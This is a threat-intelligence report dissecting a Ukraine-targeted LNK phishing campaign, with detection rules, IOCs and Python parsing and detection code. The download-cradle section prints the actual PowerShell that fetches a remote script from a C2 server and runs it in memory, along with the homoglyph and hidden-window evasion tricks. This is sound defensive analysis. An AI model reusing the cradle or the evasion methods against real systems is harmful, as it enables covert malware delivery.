Dissecting a Ukraine-Targeted LNK Campaign: Cyrillic Homoglyphs, Fileless PowerShell, and Bulletproof Hosting
Published: 2026-03-08 | Author: Breakglass Intelligence | TLP:WHITE
TL;DR
A phishing campaign targeting Ukrainian-speaking organizations delivers a ZIP archive containing a .lnk file masquerading as a quarterly financial report (02.26_qurtal.docx). The shortcut launches a hidden PowerShell process that uses a WinHttp.WinHttpRequest.5.1 COM object to fetch and execute a Stage 2 script entirely in memory. The LNK display name contains Cyrillic homoglyph substitutions to defeat string-matching detections. Infrastructure is hosted on the ALTAWK/DGTLS-MNT bulletproof hosting cluster in Amsterdam -- the same network previously linked to NetSupport RAT deployments, AmateraStealer, and BrowserWare ClickFix campaigns.
Attack Chain Overview
```text
ZIP archive
└── 02.26_qurtal.docx.lnk (double extension; victim sees "02.26_qurtal.docx")
    └── C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        ├── -w Hidden (window hidden at PS level)
        ├── SW_SHOWMINNOACTIVE (window minimized at LNK level)
        ├── WinHttp COM download cradle → http://195.10.205[.]65/datemed/slappicnic.ps1
        └── [ScriptBlock]::Create() + dot-source → fileless Stage 2 execution
```
The kill chain is straightforward but layered with evasion at every step: double file extension masquerading, dual window-hiding, COM-based HTTP instead of PowerShell cmdlets, a custom User-Agent gate for server-side victim validation, and in-memory execution via ScriptBlock::Create to avoid touching disk.
The Lure: Quarterly Report for February 26
The filename 02.26_qurtal.docx.lnk is designed for Ukrainian-speaking targets:
- 02.26 -- a February 26 date reference, establishing time-relevance
- qurtal -- a phonetic rendering of the Ukrainian word "kvartal" (quarter/quarterly), suggesting a financial or administrative report
- .docx.lnk -- Windows hides the .lnk extension by default, so the victim sees 02.26_qurtal.docx
- IconLocation: imageres.dll index 97 (generic document icon)
Combined with the LNK display name "MS Word Document," the file is indistinguishable from a legitimate Word document in Windows Explorer.
Cyrillic Homoglyph Evasion in the Display Name
The LNK NAME_STRING field reads "MS Word Document" -- but two characters are Cyrillic substitutions that are visually identical to their Latin counterparts:
| Position | Displayed Character | Actual Codepoint | Expected Codepoint |
|---|---|---|---|
| 4 (in "Word") | о | U+043E (Cyrillic Small Letter O) | U+006F (Latin o) |
| 13 (in "Document") | е | U+0435 (Cyrillic Small Letter IE) | U+0065 (Latin e) |
This defeats any detection rule matching the Latin string "MS Word Document" -- the visual output is identical, but the byte sequences differ. This technique is more commonly associated with state-level or advanced criminal actors. It maps to MITRE ATT&CK T1027.013 (Obfuscated Files or Information: Encrypted/Encoded File).
The Download Cradle
The PowerShell command embedded in the LNK arguments:
```powershell
-w Hidden $r = New-Object -ComObject 'WinHttp.WinHttpRequest.5.1';
$r.Open('GET', 'http://195.10.205[.]65/datemed/slappicnic.ps1', $false);
$r.SetRequestHeader('User-Agent', 'UA WindowsPowerShell');
$r.Send();
. ([ScriptBlock]::Create($r.ResponseText))
```
Several deliberate choices here:
WinHttp.WinHttpRequest.5.1 COM object -- Most PowerShell download cradles use Invoke-WebRequest, Invoke-RestMethod, or System.Net.WebClient. The WinHttp COM object operates at a lower level and bypasses some AMSI/EDR hooks that instrument the standard PowerShell cmdlets. This technique is more commonly seen in commodity malware frameworks than in known Ukrainian-targeting APT tooling.
Custom User-Agent UA WindowsPowerShell -- This is a server-side gate. The legitimate PowerShell User-Agent string is Mozilla/5.0 (Windows NT; Windows NT X.X; en-US) WindowsPowerShell/5.1. The shortened UA WindowsPowerShell is a deliberate custom value that the C2 server can check to filter out sandbox/researcher traffic. Only requests with the matching UA receive the payload.
[ScriptBlock]::Create() + dot-sourcing -- An IEX (Invoke-Expression) alternative. Functionally equivalent but less commonly flagged by detection rules. The dot-source operator (.) executes the created script block in the current scope, leaving no disk artifacts.
$false synchronous flag -- The Open() call uses synchronous mode, blocking until the response is received before executing. No race conditions, no timing issues.
Dual Window Hiding
The operator applies window concealment at two independent layers:
- LNK level: ShowCommand = 7 (SW_SHOWMINNOACTIVE) -- the spawned process window starts minimized without taking focus
- PowerShell level: -w Hidden (-WindowStyle Hidden) -- the PowerShell window is hidden entirely
If either layer fails or is stripped, the other still conceals the execution. This maps to T1564.003 (Hide Artifacts: Hidden Window).
Zero-Padding for Size Masquerading
The LNK file is 6,110 bytes, but 82.7% (5,053 bytes) is zero padding appended after the terminal data block. The actual payload and LNK structure occupy only 1,056 bytes. This inflates the file to a size that appears more plausible as a document. A 1KB "Word file" would raise suspicion; a 6KB one less so.
No hidden data exists in the padded region -- it is purely for size inflation.
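The structural facts above (NAME_STRING homoglyphs, ShowCommand 7, icon index 97, zero padding after the terminal block) can be pulled out of a shortcut programmatically. The following is an added Python example, not the report authors' tooling: a minimal MS-SHLLINK parser run over a sample LNK constructed inline with the same properties (it is not the campaign file; the argument string and padding size are illustrative).

```python
import struct
import unicodedata
# Constructed sample (not the campaign file): a minimal Shell Link with a homoglyph
# NAME_STRING, ShowCommand 7, IconIndex 97 and zero padding after the terminal block.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
STRING_FIELDS = (("name", 0x04), ("relative_path", 0x08), ("working_dir", 0x10),
                 ("arguments", 0x20), ("icon_location", 0x40))   # StringData, in spec order
NAME_WITH_HOMOGLYPHS = "MS W\u043erd Docum\u0435nt"   # Cyrillic o (U+043E) and ie (U+0435)

def _utf16(s):                       # CountCharacters (uint16) + UTF-16LE chars, no terminator
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")

def build_sample_lnk(padding=5053):
    flags = 0x04 | 0x20 | 0x40 | 0x80            # HasName|HasArguments|HasIconLocation|IsUnicode
    header = struct.pack("<I16sIIQQQIIIH", 0x4C, LNK_CLSID, flags, 0x20, 0, 0, 0, 0,
                         97, 7, 0) + b"\x00" * 10  # IconIndex 97, ShowCommand 7, reserved bytes
    body = (_utf16(NAME_WITH_HOMOGLYPHS)
            + _utf16("-w Hidden $r = New-Object -ComObject 'WinHttp.WinHttpRequest.5.1'")
            + _utf16("%SystemRoot%\\System32\\imageres.dll"))
    return header + body + b"\x00" * 4 + b"\x00" * padding   # terminal block, then padding

def parse_lnk(data):
    size, clsid, flags, _a, _c, _t, _w, _f, icon, show, _k = struct.unpack_from("<I16sIIQQQIIIH", data, 0)
    if size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    pos = 0x4C
    if flags & 0x01:                             # HasLinkTargetIDList: IDListSize + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & 0x02:                             # HasLinkInfo: LinkInfoSize covers the block
        pos += struct.unpack_from("<I", data, pos)[0]
    strings = {}
    for field, bit in STRING_FIELDS:
        if flags & bit:
            n, width = struct.unpack_from("<H", data, pos)[0], (2 if flags & 0x80 else 1)
            raw = data[pos + 2:pos + 2 + n * width]
            strings[field] = raw.decode("utf-16-le" if width == 2 else "cp1252")
            pos += 2 + n * width
    while True:                                  # ExtraData: BlockSize < 4 is the terminal block
        block = struct.unpack_from("<I", data, pos)[0]
        pos += max(block, 4)
        if block < 4:
            break
    tail = data[pos:]
    return {"show_command": show, "icon_index": icon, "strings": strings, "structure_bytes": pos,
            "padding_bytes": len(tail), "padding_all_zero": tail.count(0) == len(tail)}

def homoglyphs(text):                # letters whose Unicode name is not LATIN, with 0-based position
    return [(i, f"U+{ord(c):04X}", unicodedata.name(c, "?")) for i, c in enumerate(text)
            if c.isalpha() and not unicodedata.name(c, "").startswith("LATIN")]
```

Feeding a real shortcut to parse_lnk and homoglyphs yields the same fields the Build Indicators table lists, plus the padding ratio.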
C2 Infrastructure: ALTAWK Bulletproof Hosting
The Stage 2 payload URL resolves to 195.10.205[.]65, part of the ALTAWK-AMS2 /25 allocation:
| Field | Value |
|---|---|
| IP | 195.10.205[.]65 |
| Range | 195.10.205.0/25 |
| Netname | ALTAWK-AMS2 |
| Country | NL (Netherlands, Amsterdam) |
| Org | Partner Hosting LTD |
| Address | 71-75 Shelton Street, Covent Garden, London WC2H 9JQ |
| Abuse | abuse@altawk[.]com |
| Maintainers | altawk-com-mnt, Lir-zk-mnt, MNT-DGTL, DGTLS-MNT |
| Allocation Date | 2024-02-08 |
| Reverse DNS | None (SERVFAIL) |
| Server | Apache/2.4.58 (Ubuntu 24.04) |
| SSH | OpenSSH_9.6p1 Ubuntu-3ubuntu13.13 |
| Open Ports | 22 (SSH), 80 (HTTP) only |
The registered address at 71-75 Shelton Street is a well-known mail drop in London used by thousands of shell companies. Partner Hosting LTD is a documented bulletproof hosting provider identified by Sophos and CISA/NSA/FBI as part of an ecosystem that provisions VMs through ISPsystem's VMmanager platform for malicious use.
Cross-Campaign Infrastructure Overlap
The ALTAWK/DGTLS-MNT network hosts confirmed malicious operations beyond this campaign:
| Campaign | IP | Infrastructure |
|---|---|---|
| Ukraine LNK PS cradle | 195.10.205[.]65 | ALTAWK-AMS2 /25 |
| NetSupport RAT open directory | 193.111.117[.]17 | DGTLS-MNT (AS200823) |
| AmateraStealer C2 | 77.91.96[.]205 | ALTAWK |
| BrowserWare ClickFix | 77.91.65[.]56 | DGTLS-MNT / Partner Hosting |
A FASTPANEL default page on 195.10.205[.]67 (same /25) confirms ISPsystem infrastructure provisioning, consistent with the Sophos and CISA research on bulletproof hosting providers using ISPsystem/VMmanager templates.
Multi-Wave Campaign: Additional Payloads Discovered
OTX URL enumeration for 195.10.205[.]65 revealed a second campaign directory /kkraag/ with two additional PowerShell payloads predating the /datemed/ wave by approximately two days:
| URL | First Seen | Status |
|---|---|---|
| http://195.10.205[.]65/datemed/slappicnic.ps1 | 2026-03-06 | 403 |
| http://195.10.205[.]65/kkraag/golfproceedings.ps1 | 2026-02-24 | 403 |
| http://195.10.205[.]65/kkraag/tactilelivestock.ps1 | 2026-02-24 | 403 |
All payload filenames follow an auto-generated compound-word pattern (two unrelated English words concatenated without separators): slappicnic, golfproceedings, tactilelivestock. This is consistent with automated word-pair generation used by commodity malware frameworks for URL randomization. The rotating directory names (datemed, kkraag) suggest per-wave infrastructure separation.
All endpoints now return HTTP 403 universally -- the server has been locked down or decommissioned. Comprehensive path probing (24 common paths, all HTTP methods, geo-fence bypass attempts via X-Forwarded-For) returned 403 across the board, indicating a blanket Require all denied directive.
Network Neighborhood Analysis
A scan of all 127 IPs in the ALTAWK-AMS2 /25 found 18 IPs responding on port 80 with mixed server software (Apache, nginx, IIS), confirming multi-tenant VM hosting. Notable findings:
- 195.10.205[.]70 -- Returns identical 403 response pattern but runs Apache/2.4.52 on Ubuntu 22.04 (vs. 2.4.58/24.04 on .65). Different VM, similar configuration. Potential second campaign server.
- 195.10.205[.]54 -- Runs Microsoft IIS/10.0 (Windows Server), consistent with ISPsystem VMmanager provisioning Windows VMs.
- 195.10.205[.]67 -- Serves FASTPANEL default page, confirming ISPsystem infrastructure.
- 195.10.205[.]43 -- Redirects to internetwarriors[.]com, a minimal "cybersecurity and digital defense" landing page parked on bulletproof infrastructure.
Attribution Assessment
Verdict: UNATTRIBUTED -- mid-tier cybercriminal operation with Ukrainian targeting, likely operating within a PPI (pay-per-install) network.
We compared the TTPs against active Ukrainian-targeting groups tracked by CERT-UA:
| Group | Delivery Chain | Match Level |
|---|---|---|
| UAC-0010 (Gamaredon) | LNK → PS → DLL (Remcos RAT) | Strong delivery overlap, different PS techniques and infrastructure |
| UAC-0241 | LNK → HTA → PS → Go (GAMYBEAR) | Strong delivery overlap, uses mshta.exe chain |
| APT28 | ZIP → HTA → VBS → loader (BadPaw) | Partial, different execution chain |
| UAC-0219 | VBS → PS stealer (WRECKSTEEL) | Partial, no LNK component |
| UAC-0252 | EXE in archive (SalatStealer) | Weak, different delivery entirely |
None of these groups are documented using WinHttp.WinHttpRequest.5.1 for download, the UA WindowsPowerShell User-Agent gate, ScriptBlock::Create for execution, or ALTAWK/Partner Hosting infrastructure. The TTP combination does not match any known tracked actor.
Arguments for state-affiliated: Ukrainian-language quarterly report lure (targeted, not mass spam), Cyrillic homoglyph evasion (sophisticated), fileless execution chain, specific date reference suggesting event-timed campaign.
Arguments for commodity/criminal: WinHttp COM object common in commodity downloaders, auto-generated payload names, ALTAWK bulletproof hosting (multi-tenant, used by many actors), simple single-stage PS download (APTs typically use multi-stage chains).
Timeline
- 2024-02-08 -- ALTAWK-AMS2 /25 range created in RIPE
- 2025-02-03 -- altawk.com flagged as malicious on ANY.RUN
- 2025-05-23 -- 195.10.205.70 first seen in OTX
- 2026-02-17 -- LNK weaponization timestamp (15:23:05 UTC)
- 2026-02-24 -- /kkraag/ payloads first observed on OTX; IP added to malware-filter botnet list; @smica83 tweets first opendir report
- 2026-02-26 -- /kkraag/ directory first probed (HTTP 403); "02.26" date reference in LNK filename
- 2026-03-05 -- @smica83 tweets second opendir report
- 2026-03-06 -- Investigation begins → all payloads return 403
The payload availability window was extremely short -- possibly hours to days between deployment and lockdown. By the time the /kkraag/ payloads appeared in OTX on Feb 24, they were already returning 403.
MITRE ATT&CK Mapping
| Technique ID | Name | Usage |
|---|---|---|
| T1566.001 | Phishing: Spearphishing Attachment | ZIP archive delivery |
| T1204.002 | User Execution: Malicious File | LNK disguised as DOCX |
| T1036.007 | Masquerading: Double File Extension | .docx.lnk hiding |
| T1036.005 | Masquerading: Match Legitimate Name | "MS Word Document" display name |
| T1027.013 | Obfuscated Files: Encrypted/Encoded File | Cyrillic homoglyph substitution |
| T1059.001 | Command and Scripting Interpreter: PowerShell | Download cradle execution |
| T1071.001 | Application Layer Protocol: Web Protocols | HTTP GET to C2 |
| T1105 | Ingress Tool Transfer | Stage 2 PS1 download |
| T1564.003 | Hide Artifacts: Hidden Window | Dual window hiding |
| T1218 | System Binary Proxy Execution | powershell.exe as LOLBin |
Detection
Suricata / Snort
```text
alert http $HOME_NET any -> any any (
    msg:"Ukraine LNK Campaign - WinHttp PS Download Cradle";
    content:"GET"; http_method;
    content:"UA WindowsPowerShell"; http_header;
    pcre:"/\/[a-z]+\/[a-z]+\.(ps1|txt|hta)/Ui";
    sid:2026030601; rev:1;
)
```
Sysmon
EventID 1 (Process Creation):
- ParentImage ends with \explorer.exe
- Image ends with \powershell.exe
- CommandLine contains WinHttp.WinHttpRequest.5.1 AND contains ScriptBlock]::Create (the LNK argument string literally reads [ScriptBlock]::Create, so a bare ScriptBlock::Create substring would not match)
EventID 3 (Network Connection):
- Image ends with \powershell.exe
- DestinationIp in 195.10.205.0/25
- DestinationPort = 80
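The Sysmon logic above and the cradle indicators from the download-cradle section, expressed as an added Python check (not part of the original report) and run over constructed sample events. Field names follow Sysmon's; the events, the rule names and the simplified dict shape are assumptions, and the command-line match uses the literal ScriptBlock]::Create because the argument string contains [ScriptBlock]::Create.

```python
import ipaddress
import re

# Constructed sample events in a simplified Sysmon-like shape (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": ("powershell.exe -w Hidden $r = New-Object -ComObject 'WinHttp.WinHttpRequest.5.1'; "
                     "$r.Open('GET', 'http://195.10.205.65/datemed/slappicnic.ps1', $false); "
                     "$r.SetRequestHeader('User-Agent', 'UA WindowsPowerShell'); $r.Send(); "
                     ". ([ScriptBlock]::Create($r.ResponseText))")},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",      # benign admin script, no hits
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"EventID": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationIp": "195.10.205.65", "DestinationPort": 80},
    {"EventID": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "195.10.205.70", "DestinationPort": 80},
]

C2_RANGE = ipaddress.ip_network("195.10.205.0/25")                       # ALTAWK-AMS2 allocation
CRADLE_MARKERS = ("WinHttp.WinHttpRequest.5.1", "ScriptBlock]::Create")  # note the ']' in the real literal
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)

def classify(event):
    """Return the names of the checks that fire on one event (rule names are assumptions)."""
    hits = []
    image = event.get("Image", "").lower()
    is_ps = image.endswith(r"\powershell.exe")
    if event["EventID"] == 1 and is_ps:
        cmd = event.get("CommandLine", "")
        folded = cmd.casefold()
        if all(m.casefold() in folded for m in CRADLE_MARKERS):
            hits.append("ps_winhttp_scriptblock_cradle")
        if "ua windowspowershell" in folded:
            hits.append("ps_custom_ua_gate")
        if HIDDEN_WINDOW.search(cmd) and event.get("ParentImage", "").lower().endswith(r"\explorer.exe"):
            hits.append("ps_hidden_window_from_explorer")
    if event["EventID"] == 3 and event.get("DestinationPort") == 80:
        if ipaddress.ip_address(event["DestinationIp"]) in C2_RANGE:
            hits.append("ps_to_altawk_range" if is_ps else "any_to_altawk_range")
    return hits

def scan(events):
    """Map event index -> fired checks, omitting events with no hits."""
    results = {i: classify(e) for i, e in enumerate(events)}
    return {i: h for i, h in results.items() if h}
```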
YARA
```yara
rule ukraine_lnk_winhttprequest_cradle {
    meta:
        description = "LNK with WinHttpRequest PowerShell download cradle"
        author = "Breakglass Intelligence"
        date = "2026-03-08"
        reference = "https://intel.breakglass.tech"
        tlp = "white"
    strings:
        $lnk_magic = { 4C 00 00 00 01 14 02 00 }   // HeaderSize 0x4C followed by the start of the Shell Link CLSID
        $winhttpreq = "WinHttp.WinHttpRequest" wide ascii
        $scriptblock = "ScriptBlock" wide ascii
        $ua_ps = "UA WindowsPowerShell" wide ascii
    condition:
        // $ua_ps was declared but never referenced, which yara rejects at compile time;
        // the custom User-Agent gate string now serves as an alternative to the ScriptBlock marker
        $lnk_magic at 0 and $winhttpreq and ($scriptblock or $ua_ps)
}
```
Infrastructure Hunting
Pivot on SSH host key fingerprints via Shodan/Censys to find additional servers provisioned by the same operator:
- RSA: SHA256:O+oP677Y1bxtTBxaVyvZzzTolt5igT8XrFgo/sNM7Nk
- Ed25519: SHA256:pUjBuPM3sGNhLKJD3cypdwSYQXlochcO1RdLO0zm3pk
Monitor the broader ALTAWK allocation:
- 195.10.205.0/25 -- this range
- 77.91.64.0/20 -- broader ALTAWK allocation
- 193.111.117.0/24 -- DGTLS-MNT range
Indicators of Compromise
Files
| Indicator | File | Value |
|---|---|---|
| LNK MD5 | 02.26_qurtal.docx.lnk | 4999efed7397536355c5d353283240c8 |
| LNK SHA-256 | 02.26_qurtal.docx.lnk | bee1f85acc47382c2ed67c7bb636dff411965e5bdb0e105f44469f3bf05fa812 |
| ZIP SHA-256 | Container archive | 062881cabcd9eb2a9163601cf207a9573bd07d56d64f2a508b917bd74b5a1f46 |
Network
| Indicator | Type | Context |
|---|---|---|
| 195.10.205[.]65 | IPv4 | C2 server (ALTAWK-AMS2, Partner Hosting LTD, NL) |
| 195.10.205[.]70 | IPv4 | Potential second campaign server (same /25) |
| http://195.10.205[.]65/datemed/slappicnic.ps1 | URL | Stage 2 payload (current wave) |
| http://195.10.205[.]65/kkraag/golfproceedings.ps1 | URL | Stage 2 payload (prior wave) |
| http://195.10.205[.]65/kkraag/tactilelivestock.ps1 | URL | Stage 2 payload (prior wave) |
| UA WindowsPowerShell | User-Agent | Server-side gate string |
Infrastructure Fingerprints
| Indicator | Type | Value |
|---|---|---|
| SSH RSA fingerprint | Host key | SHA256:O+oP677Y1bxtTBxaVyvZzzTolt5igT8XrFgo/sNM7Nk |
| SSH Ed25519 fingerprint | Host key | SHA256:pUjBuPM3sGNhLKJD3cypdwSYQXlochcO1RdLO0zm3pk |
| SSH banner | Service | SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.13 |
| HTTP Server | Service | Apache/2.4.58 (Ubuntu) |
Build Indicators
| Indicator | Value |
|---|---|
| Weaponization timestamp | 2026-02-17 15:23:05 UTC |
| LNK target path | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| ShowCommand | 7 (SW_SHOWMINNOACTIVE) |
| IconLocation | imageres.dll index 97 |
| Cyrillic homoglyphs | U+043E at position 4, U+0435 at position 13 |
Cross-Campaign Infrastructure (ALTAWK/DGTLS-MNT)
| IP | Campaign |
|---|---|
| 193.111.117[.]17 | NetSupport RAT open directory |
| 77.91.96[.]205 | AmateraStealer C2 |
| 77.91.65[.]56 | BrowserWare ClickFix |